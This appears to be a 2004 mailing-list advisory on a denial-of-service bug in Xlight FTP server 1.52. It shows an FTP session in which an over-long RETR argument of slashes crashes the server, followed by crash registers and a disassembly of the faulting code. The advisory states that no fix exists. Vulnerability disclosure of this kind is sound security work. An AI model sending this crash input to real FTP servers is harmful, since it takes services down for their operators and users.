Xlight ftp server 1.52 RETR bug

"intuit e.b." <intuit@linuxmail.org> · Sun, 15 Feb 2004 20:51:45 +0800

Application:  Xlight ftp server
              http://www.xlightftpd.com/

Version:      1.52

Bug:          Denial Of Service

Author:       intuit
              e-mail: intuit@linuxmail.org
              web: http://rootshells.tk/

***********************************************************************

1. Description
2. The bug
3. The code
4. The fix

***********************************************************************

^^^^^^^^^^^^^^^^
1. Description:
^^^^^^^^^^^^^^^^

Vendor's Description:

"Xlight ftp server is a powerful ftp server with very small program size. 
Using its own unique algorithm, it could handle more users than other windows 
ftp servers. Besides its high performance, xlight ftp server also has a lot 
of unique features."

***********************************************************************

^^^^^^^^^^^^^^^^
2. The bug:
^^^^^^^^^^^^^^^^

RETR parameter (>260 symbols) crashed ftp server:

-----------------------------------------------------------------------
ftp> open
To 192.168.144.56
Connected to 192.168.144.56.
220 Xlight Server 1.52 ready...
User (192.168.144.56:(none)): test
331 Password required for test
Password:
230 Login OK.
ftp> literal pasv
227 Entering passive mode (192,168,144,56,5,8) .
ftp> literal retr /////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////
//////////////////////////////////////////qwer
Connection closed by remote host.
-----------------------------------------------------------------------

Ftp server will crashed with error in xlight.exe.

***********************************************************************

^^^^^^^^^^^^^^^^
3. The code:
^^^^^^^^^^^^^^^^

The mistake occurs here:

"xlight.exe has encountered a problem and needs to close.  
We are sorry for the inconvenience."
-----------------------------------------------------------------------
AppName: xlight.exe	 AppVer: 0.0.0.0	 ModName: xlight.exe
ModVer: 0.0.0.0	 Offset: 00016549
-----------------------------------------------------------------------

-----------------------------------------------------------------------
Registers:

 EAX=2F2F2F2F EBX=00000000 ECX=00E3F420 EDX=00000000 
 ESI=000001FA EDI=00000169 EIP=00416549 ESP=00E3EEC4 
 EBP=00E3F000 EFL=00000212 
 CS=001B DS=0023 ES=0023 SS=0023
 FS=0038 GS=0000 OV=0 UP=0 EI=1 PL=0 ZR=0 AC=1 PE=0 CY=0

 2F2F2F43 = ????????

Code:

004164C8   push        ebp
004164C9   mov         ebp,esp
004164CB   sub         esp,22Ch
004164D1   mov         eax,dword ptr [ebp+8]
004164D4   shl         eax,4
004164D7   mov         ecx,dword ptr ds:[48CACCh]
004164DD   lea         edx,[ecx+eax+3A8h]
004164E4   mov         dword ptr [ebp-8],edx
004164E7   mov         eax,dword ptr [ebp-8]
004164EA   mov         ecx,dword ptr [eax+8]
004164ED   mov         dword ptr [ebp-0Ch],ecx
004164F0   mov         edx,dword ptr [ebp+8]
004164F3   push        edx
004164F4   call        004149B6
004164F9   add         esp,4
004164FC   mov         dword ptr [ebp-14h],eax
004164FF   cmp         dword ptr [ebp-14h],0
00416503   jne         0041650A
00416505   jmp         004166E8
0041650A   mov         eax,dword ptr [ebp+10h]
0041650D   push        eax
0041650E   lea         ecx,[ebp-120h]
00416514   push        ecx
00416515   call        0045D7E0
0041651A   add         esp,8
0041651D   mov         edx,dword ptr [ebp-14h]
00416520   add         edx,1798h
00416526   mov         dword ptr [ebp-18h],edx
00416529   mov         eax,dword ptr [ebp+14h]
0041652C   add         eax,18h
0041652F   push        eax
00416530   mov         ecx,dword ptr [ebp+14h]
00416533   add         ecx,14h
00416536   push        ecx
00416537   lea         edx,[ebp-120h]
0041653D   push        edx
0041653E   call        00404661
00416543   add         esp,0Ch
00416546   mov         eax,dword ptr [ebp+14h]
00416549   mov         eax,dword ptr [eax+14h]  <<< ftp server crashing here
0041654C   xor         edx,edx
0041654E   mov         ecx,64h
00416553   div         eax,ecx
00416555   mov         dword ptr [ebp-22Ch],edx
0041655B   mov         dword ptr [ebp-1Ch],0
00416562   jmp         0041656D
00416564   mov         edx,dword ptr [ebp-1Ch]
00416567   add         edx,1
0041656A   mov         dword ptr [ebp-1Ch],edx
0041656D   cmp         dword ptr [ebp-1Ch],2
00416571   jge         004166E8
-----------------------------------------------------------------------

/*Tested on: Win XP Build 2600, Service Pack: None
             Win XP Build 2600, Service Pack: SP1  */

***********************************************************************

^^^^^^^^^^^^^^^^
4. The fix:
^^^^^^^^^^^^^^^^

Not exist.

***********************************************************************

-- 
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org 
This allows you to send and receive SMS through your mailbox.

Powered by Outblaze